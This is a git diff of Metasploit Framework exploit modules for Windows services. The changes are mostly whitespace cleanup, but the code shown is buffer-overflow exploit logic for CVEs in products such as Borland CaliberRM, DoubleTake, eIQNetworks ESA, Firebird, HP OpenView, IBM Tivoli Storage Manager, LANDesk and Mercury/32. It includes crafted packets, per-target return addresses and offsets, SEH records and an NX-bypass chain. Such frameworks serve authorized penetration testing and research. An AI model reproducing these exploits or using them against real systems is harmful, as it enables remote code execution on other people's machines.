@@ -54,16 +52,15 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'July 24 2007')) - register_options([Opt::RPORT(3050)], self.class) - + register_options([Opt::RPORT(3050)], self.class) end def exploit connect - # Build the exploit buffer.... It's a biggie! + # Build the exploit buffer.... It's a biggie! sploit = "\x00\x00\x00\x14" + "\x00\x00\x00\x13" + rand_text_alpha_upper(target['Offset']) - sploit << payload.encoded + Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2) + sploit << payload.encoded + Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2) sploit << [target.ret].pack('V') + [0xe8, -850].pack('CV') + rand_text_alpha_upper(40000) print_status("Trying target #{target.name}...") diff --git a/modules/exploits/windows/misc/borland_starteam.rb b/modules/exploits/windows/misc/borland_starteam.rb index 3f349f91e0..79ecaa42d7 100644 --- a/modules/exploits/windows/misc/borland_starteam.rb +++ b/modules/exploits/windows/misc/borland_starteam.rb @@ -1,14 +1,16 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking 
@@ -19,13 +21,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Borland CaliberRM StarTeam Multicast Service Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Borland CaliberRM 2006. By sending - a specially crafted GET request to the STMulticastService, an attacker may be - able to execute arbitrary code. + a specially crafted GET request to the STMulticastService, an attacker may be + able to execute arbitrary code. }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2008-0311' ], [ 'OSVDB', '44039' ], [ 'BID', '28602' ], @@ -37,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Payload' => { 'Space' => 600, - 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", + 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 'StackAdjustment' => -3500, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", }, @@ -51,19 +53,18 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 2, 2008')) - register_options([Opt::RPORT(3057)], self.class) - + register_options([Opt::RPORT(3057)], self.class) end def exploit - + # inline payloads work best! - sploit = rand_text_english(511) + "\x00" + rand_text_english(1020) - sploit << [target.ret].pack('V') + "@" * 156 # <- :( + sploit = rand_text_english(511) + "\x00" + rand_text_english(1020) + sploit << [target.ret].pack('V') + "@" * 156 # <- :( sploit << payload.encoded + rand_text_english(rand(100) + 1) print_status("Trying target #{target.name}...") - + send_request_raw({'uri' => sploit,}, 5) handler diff --git a/modules/exploits/windows/misc/doubletake.rb b/modules/exploits/windows/misc/doubletake.rb index 583dc45902..677a39cac3 100644 --- a/modules/exploits/windows/misc/doubletake.rb +++ b/modules/exploits/windows/misc/doubletake.rb 
@@ -3,34 +3,34 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking + include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh + def initialize(info = {}) super(update_info(info, 'Name' => 'DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow', 'Description' => %q{ - This module exploits a stack overflow in the authentication mechanism of + This module exploits a stack overflow in the authentication mechanism of NSI Doubletake which is also rebranded as HP Storage Works. This vulnerability was found by Titon of Bastard Labs. }, 'Author' => [ 'ri0t <ri0t[at]ri0tnet.net>' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ - ['CVE', '2008-1661'], - ['OSVDB', '45924'], + ['CVE', '2008-1661' ], + ['OSVDB', '45924' ], ], 'DefaultOptions' => { @@ -42,11 +42,11 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00", }, 'Platform' => 'win', - + 'Targets' => [ ['doubletake 4.5.0', { 'Ret' => 0x006f5fa7, 'Offset' => 5544 } ], - ['doubletake 4.4.2', { 'Ret' => 0x0074e307, 'Offset' => 944 } ], + ['doubletake 4.4.2', { 'Ret' => 0x0074e307, 'Offset' => 944 } ], ['doubletake 4.5.0.1819', { 'Ret' => 0x006e62dd, 'Offset' => 5544 } ], ], 'DefaultTarget' => 0, @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => false )) - register_options( + register_options( [ Opt::RPORT(1100) ], self.class) 
@@ -66,11 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Trying target #{target.name}...") - header = - "\x00\x02\x00\x01\x27\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x00"+ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"+ - "\x00\x00\x00\x1e\x00\x00\x00\x01\x00\x01" + header = + "\x00\x02\x00\x01\x27\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x00"+ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"+ + "\x00\x00\x00\x1e\x00\x00\x00\x01\x00\x01" xor = Rex::Encoding::Xor::Byte filler = rand_text_english(1) * (target['Offset']) @@ -78,9 +78,9 @@ class Metasploit3 < Msf::Exploit::Remote buffercoded = xor.encode(seh+payload.encoded, [0xf0].pack("C")) sploit = header + filler + buffercoded[0] sock.put(sploit) - + handler - disconnect + disconnect end end diff --git a/modules/exploits/windows/misc/eiqnetworks_esa.rb b/modules/exploits/windows/misc/eiqnetworks_esa.rb index a25e5bd813..58fbf911a3 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking 
@@ -22,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow', 'Description' => %q{ - This module exploits a stack overflow in eIQnetworks + This module exploits a stack overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the LICMGR_ADDLICENSE command, a stack-based buffer overflow occurs. This module has only been tested @@ -30,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'ri0t <ri0t[at]ri0tnet.net>', 'kf' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ ['CVE', '2006-3838'], ['OSVDB', '27526'], @@ -48,11 +46,10 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', - 'Targets' => [ - ['EnterpriseSecurityAnalyzerv21 Universal', { 'Ret' => 0x00448187, 'Offset' => 494 } ], - + ['EnterpriseSecurityAnalyzerv21 Universal', { 'Ret' => 0x00448187, 'Offset' => 494 } ], + ['EiQ Enterprise Security Analyzer Offset 494 Windows 2000 SP0-SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 494 } ], # call ebx ['EiQ Enterprise Security Analyzer Offset 494 Windows XP English SP1/SP2', { 'Ret' => 0x77db64dc, 'Offset' => 494 } ], # jmp ebx ['EiQ Enterprise Security Analyzer Offset 494 Windows Server 2003 SP0/SP1', { 'Ret' => 0x77d16764, 'Offset' => 494 } ], # jmp EBX 
@@ -73,16 +70,13 @@ class Metasploit3 < Msf::Exploit::Remote ['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' => 0x77d16764, 'Offset' => 1262 } ], ['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows 2000 SP0-SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 1262 } ], ['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows XP English SP1/SP2', { 'Ret' => 0x77db64dc, 'Offset' => 1262 } ], - ['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' => 0x77d16764, 'Offset' => 1262 } ], + ['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' => 0x77d16764, 'Offset' => 1262 } ], ], - 'Privileged' => false, - 'DisclosureDate' => 'July 24 2006' - )) - register_options( + register_options( [ Opt::RPORT(10616) ], self.class) @@ -99,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote sock.put(sploit) handler - disconnect + disconnect end end diff --git a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb index 9ef668eb9f..6a36d3a26c 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking 
@@ -22,18 +20,17 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'eIQNetworks ESA Topology DELETEDEVICE Overflow', 'Description' => %q{ - This module exploits a stack overflow in eIQnetworks + This module exploits a stack overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the DELETEDEVICE command in the Topology server, a stack-based buffer overflow occurs. This module has only been tested against ESA v2.1.13. - }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2006-3838'], ['OSVDB', '27528'], ['BID', '19164'], @@ -49,21 +46,17 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', - 'Targets' => [ [ 'Windows 2000 SP4 English', { 'Ret' => 0x77e14c29 } ], [ 'Windows XP SP2 English', { 'Ret' => 0x77d57447 } ], - [ 'Windows 2003 SP1 English', { 'Ret' => 0x773b24da } ], + [ 'Windows 2003 SP1 English', { 'Ret' => 0x773b24da } ], ], - 'Privileged' => false, - 'DisclosureDate' => 'July 25 2006' - )) - register_options( + register_options( [ Opt::RPORT(10628) ], self.class) @@ -76,12 +69,12 @@ class Metasploit3 < Msf::Exploit::Remote filler = rand_text_alphanumeric(128) + [target.ret].pack('V') + make_nops(20) - sploit = "DELETEDEVICE&" + filler + payload.encoded + sploit = "DELETEDEVICE&" + filler + payload.encoded sock.put(sploit) handler - disconnect + disconnect end end diff --git a/modules/exploits/windows/misc/eureka_mail_err.rb b/modules/exploits/windows/misc/eureka_mail_err.rb index 01448b2f57..2981a132b8 100644 --- a/modules/exploits/windows/misc/eureka_mail_err.rb +++ b/modules/exploits/windows/misc/eureka_mail_err.rb 
@@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,8 +23,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Description' => %q{ This module exploits a buffer overflow in the Eureka Email 2.2q client that is triggered through an excessively long ERR message. - - NOTE: this exploit isn't very reliable. Unfortunately reaching the + + NOTE: this exploit isn't very reliable. Unfortunately reaching the vulnerable code can only be done when manually checking mail (Ctrl-M). Checking at startup will not reach the code targeted here. }, @@ -52,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => true, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Win XP SP3 English', { 'Ret' => 0x7E429353 } ], # jmp esp / user32.dll [ 'Win XP SP2 English', { 'Ret' => 0x77D8AF0A } ], # jmp esp / user32.dll 
@@ -61,32 +65,32 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The POP3 daemon port to listen on", 110 ]), ], self.class) end def on_client_connect(client) return if ((p = regenerate_payload(client)) == nil) - + # the offset to eip depends on the local ip address string length... already = "Your POP3 server had a problem.\n" already << datastore['LHOST'] already << " said:\n\n -ERR " space = (512+256+4) - already.length - + buffer = "-ERR " buffer << make_nops(space - payload.encoded.length) buffer << payload.encoded buffer << [target.ret].pack('V') buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-0x2c0").encode_string buffer << "\r\n" - + print_status("Sending exploit to #{client.peerhost}:#{client.peerport}...") client.put(buffer) - - handler + + handler service.close_client(client) end - + end diff --git a/modules/exploits/windows/misc/fb_isc_attach_database.rb b/modules/exploits/windows/misc/fb_isc_attach_database.rb index 67e87df246..33a8a7aee9 100644 --- a/modules/exploits/windows/misc/fb_isc_attach_database.rb +++ b/modules/exploits/windows/misc/fb_isc_attach_database.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -23,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Firebird Relational Database isc_attach_database() Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Borland InterBase + This module exploits a stack overflow in Borland InterBase by sending a specially crafted create request. }, 'Version' => '$Revision$', 
@@ -36,11 +34,11 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'References' => [ - [ 'CVE', '2007-5243' ], - [ 'OSVDB', '38607' ], - [ 'BID', '25917' ], - [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], - ], + [ 'CVE', '2007-5243' ], + [ 'OSVDB', '38607' ], + [ 'BID', '25917' ], + [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], + ], 'Privileged' => true, 'License' => MSF_LICENSE, 'Payload' => @@ -69,14 +67,9 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(3050) - ], - self.class - ) - + ], self.class) end - - # Create database parameter block def dpb_create isc_dpb_user_name = 28 diff --git a/modules/exploits/windows/misc/fb_isc_create_database.rb b/modules/exploits/windows/misc/fb_isc_create_database.rb index befbd8a4d4..cea9388c52 100644 --- a/modules/exploits/windows/misc/fb_isc_create_database.rb +++ b/modules/exploits/windows/misc/fb_isc_create_database.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -23,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Firebird Relational Database isc_create_database() Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Borland InterBase + This module exploits a stack overflow in Borland InterBase by sending a specially crafted create request. }, 'Version' => '$Revision$', @@ -36,11 +34,11 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'References' => [ - [ 'CVE', '2007-5243' ], - [ 'OSVDB', '38606' ], - [ 'BID', '25917' ], - [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], - ], + [ 'CVE', '2007-5243' ], + [ 'OSVDB', '38606' ], + [ 'BID', '25917' ], + [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], + ], 'Privileged' => true, 'License' => MSF_LICENSE, 'Payload' => 
@@ -69,14 +67,9 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(3050) - ], - self.class - ) - + ], self.class) end - - # Create database parameter block def dpb_create isc_dpb_user_name = 28 diff --git a/modules/exploits/windows/misc/fb_svc_attach.rb b/modules/exploits/windows/misc/fb_svc_attach.rb index 2a687f3b6a..bcfcb6d983 100644 --- a/modules/exploits/windows/misc/fb_svc_attach.rb +++ b/modules/exploits/windows/misc/fb_svc_attach.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -36,11 +34,11 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'References' => [ - [ 'CVE', '2007-5243' ], - [ 'OSVDB', '38605' ], - [ 'BID', '25917' ], - [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], - ], + [ 'CVE', '2007-5243' ], + [ 'OSVDB', '38605' ], + [ 'BID', '25917' ], + [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], + ], 'Privileged' => true, 'License' => MSF_LICENSE, 'Payload' => @@ -69,10 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(3050) - ], - self.class - ) - + ], self.class) end def exploit_target(target) diff --git a/modules/exploits/windows/misc/hp_ovtrace.rb b/modules/exploits/windows/misc/hp_ovtrace.rb index 013f0281ce..64288381b4 100644 --- a/modules/exploits/windows/misc/hp_ovtrace.rb +++ b/modules/exploits/windows/misc/hp_ovtrace.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking 
@@ -23,12 +21,12 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'HP OpenView Operations OVTrace Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in HP OpenView Operations version A.07.50. - By sending a specially crafted packet, a remote attacker may be able to execute arbitrary code. + By sending a specially crafted packet, a remote attacker may be able to execute arbitrary code. }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2007-3872' ], [ 'OSVDB', '39527' ], [ 'BID', '25255' ], @@ -46,20 +44,19 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows 2000 Advanced Server All English', { 'Ret' => 0x75022ac4 } ], + [ 'Windows 2000 Advanced Server All English', { 'Ret' => 0x75022ac4 } ], ], 'Privileged' => true, 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 9 2007')) - register_options([Opt::RPORT(5051)], self.class) - + register_options([Opt::RPORT(5051)], self.class) end def exploit connect - sploit = "\x0f\x00\x00\x06\x00" + rand_text_english(62) + sploit = "\x0f\x00\x00\x06\x00" + rand_text_english(62) sploit << Rex::Arch::X86.jmp_short(6) + make_nops(2) sploit << [target.ret].pack('V') + payload.encoded sploit << rand_text_english(2024) diff --git a/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb b/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb index 7a497ff174..71ab00fdb6 100644 --- a/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb +++ b/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking 
@@ -20,14 +18,14 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'IBM Tivoli Storage Manager Express CAD Service Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in the IBM Tivoli Storage Manager Express CAD Service. + This module exploits a stack overflow in the IBM Tivoli Storage Manager Express CAD Service. By sending a "ping" packet containing a long string, an attacker can execute arbitrary code. - - NOTE: the dsmcad.exe service must be in a particular state (CadWaitingStatus = 1) in order - for the vulnerable code to be reached. This state doesn't appear to be reachable when the + + NOTE: the dsmcad.exe service must be in a particular state (CadWaitingStatus = 1) in order + for the vulnerable code to be reached. This state doesn't appear to be reachable when the TSM server is not running. This service does not restart. }, 'Author' => [ 'jduck' ], @@ -50,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # this target should be pretty universal.. # dbghelp.dll is shipped with TSM Express, and hasn't been kept up-to-date.. 
@@ -58,38 +56,37 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 04 2009')) - - register_options( [ Opt::RPORT(1582) ], self.class ) + register_options( [ Opt::RPORT(1582) ], self.class ) end def exploit - + print_status("Trying target %s..." % target.name) - + # wchar_t buf[64]; - + #print_status("Generating sploit data...") distance = payload_space + 8 backjmp = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string copy_len = distance + backjmp.length + (1024*3) - + sploit = [0,copy_len].pack('n*') sploit << payload.encoded sploit << generate_seh_record(target.ret) sploit << backjmp # force hitting end of the stack sploit << rand_text(1024) * 3 - + data = [sploit.length,0x26,0xa5].pack('nCC') data << sploit - + got_it = false while not got_it connect print_status("Sending nasty ping request...") sock.put(data) - + begin buf = sock.get_once(-1, 5) rescue @@ -100,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote end got_it = true end - + print_status("Starting handler...") handler disconnect diff --git a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb index 8eb30eabde..b75b458553 100644 --- a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb +++ b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb 
@@ -3,30 +3,28 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'IBM Tivoli Storage Manager Express RCA Service Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in the IBM Tivoli Storage Manager Express Remote - Client Agent service. By sending a "dicuGetIdentify" request packet containing a long + This module exploits a stack overflow in the IBM Tivoli Storage Manager Express Remote + Client Agent service. By sending a "dicuGetIdentify" request packet containing a long NodeName parameter, an attacker can execute arbitrary code. - - NOTE: this exploit first connects to the CAD service to start the RCA service and obtain + + NOTE: this exploit first connects to the CAD service to start the RCA service and obtain the port number on which it runs. This service does not restart. }, 'Author' => [ 'jduck' ], @@ -51,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # this target should be pretty universal.. # dbghelp.dll is shipped with TSM Express, and hasn't been kept up-to-date.. @@ -59,12 +57,11 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 04 2009')) - - register_options( [ Opt::RPORT(1582) ], self.class ) + register_options( [ Opt::RPORT(1582) ], self.class ) end - - + + def make_tsm_packet(op,data) pkt = "" if op > 0xff 
@@ -74,8 +71,8 @@ class Metasploit3 < Msf::Exploit::Remote end pkt << data end - - + + def explode_tsm_packet(buf) return nil if buf.length < 4 len,op,magic = buf[0,4].unpack('nCC') @@ -87,11 +84,11 @@ class Metasploit3 < Msf::Exploit::Remote else data = buf[4,len] end - + return op,data end - - + + def extract_port(buf) op,data = explode_tsm_packet(buf) if op != 0x10300 @@ -109,12 +106,12 @@ class Metasploit3 < Msf::Exploit::Remote end rca_port = data[24,port_str_len].unpack('n*').pack('C*').to_i end - - + + def exploit - + print_status("Trying target %s..." % target.name) - + # first get the port number query = [1].pack('n') query << "\x00" * 10 @@ -125,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote sock.put(data) buf = sock.get_once(-1, 10) disconnect - + rca_port = extract_port(buf) if not rca_port or rca_port == 0 print_error("The RCA agent service was not started :(") @@ -133,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("RCA Agent is now running on port %u" % rca_port) end - + # trigger the vulnerability copy_len = payload_space + 4 sploit = rand_text(33) @@ -146,11 +143,11 @@ class Metasploit3 < Msf::Exploit::Remote # adjustment :) sploit << buf data = make_tsm_packet(0x10400, sploit) - + connect(true, { 'RPORT' => rca_port }) print_status("Sending specially crafted dicuGetIdentifyRequest packet...") sock.write(data) - + print_status("Starting handler...") handler disconnect diff --git a/modules/exploits/windows/misc/landesk_aolnsrvr.rb b/modules/exploits/windows/misc/landesk_aolnsrvr.rb index ec608c3aec..050bdd2e0e 100644 --- a/modules/exploits/windows/misc/landesk_aolnsrvr.rb +++ b/modules/exploits/windows/misc/landesk_aolnsrvr.rb 
@@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -28,8 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2007-1674'], ['OSVDB', '34964'], ['URL', 'http://www.tippingpoint.com/security/advisories/TSRT-07-04.html'], @@ -41,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Payload' => { 'Space' => 336, - 'StackAdjustment' => -3500, + 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => @@ -55,8 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 13 2007')) - register_options([Opt::RPORT(65535)], self.class) - + register_options([Opt::RPORT(65535)], self.class) end def exploit @@ -100,10 +97,10 @@ class Metasploit3 < Msf::Exploit::Remote # mov [esi+0Ch], eax # pop esi # retn - + txt[ 312, 4] = [ib + 0x106b1].pack('V') - - + + # finally we call NtSetInformationProcess (-1, target['ProcessInfo'], ib+0x4ec84, 4) # 0x0044ec84 is a pointer to 0x2 to disable NX # 0x0042a28e: @@ -130,13 +127,13 @@ class Metasploit3 < Msf::Exploit::Remote # One-shot overwrite =( txt = rand_text_alphanumeric(280) + [target.ret].pack('V') + payload.encoded end - + print_status("Trying target #{target.name}...") - + udp_sock.put(txt) - + handler(udp_sock) - disconnect_udp + disconnect_udp end end diff --git a/modules/exploits/windows/misc/mercury_phonebook.rb b/modules/exploits/windows/misc/mercury_phonebook.rb index d5d1c32e3e..9e2fcd120a 100644 --- a/modules/exploits/windows/misc/mercury_phonebook.rb 
+++ b/modules/exploits/windows/misc/mercury_phonebook.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -22,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Mercury/32 <= v4.01b PH Server Module Buffer Overflow', 'Description' => %q{ - This module exploits a stack-based buffer overflow in + This module exploits a stack-based buffer overflow in Mercury/32 <= v4.01b PH Server Module. This issue is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer. @@ -30,8 +28,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2005-4411' ], [ 'OSVDB', '22103'], [ 'BID', '16396' ], @@ -47,21 +45,16 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => [ [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], [ 'Windows 2000 Pro English ALL', { 'Ret' => 0x75022ac4 } ], ], - 'Privileged' => true, - 'DisclosureDate' => 'December 19 2005', - 'DefaultTarget' => 0)) - register_options([ Opt::RPORT(105)], self) - + register_options([ Opt::RPORT(105)], self) end def exploit @@ -74,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit << [target.ret].pack('V') + [0xe8, -450].pack('CV') + "\r\n" sock.put(sploit) - + handler disconnect end diff --git a/modules/exploits/windows/misc/mirc_privmsg_server.rb b/modules/exploits/windows/misc/mirc_privmsg_server.rb index 1175437f64..ad87a85d25 100644 
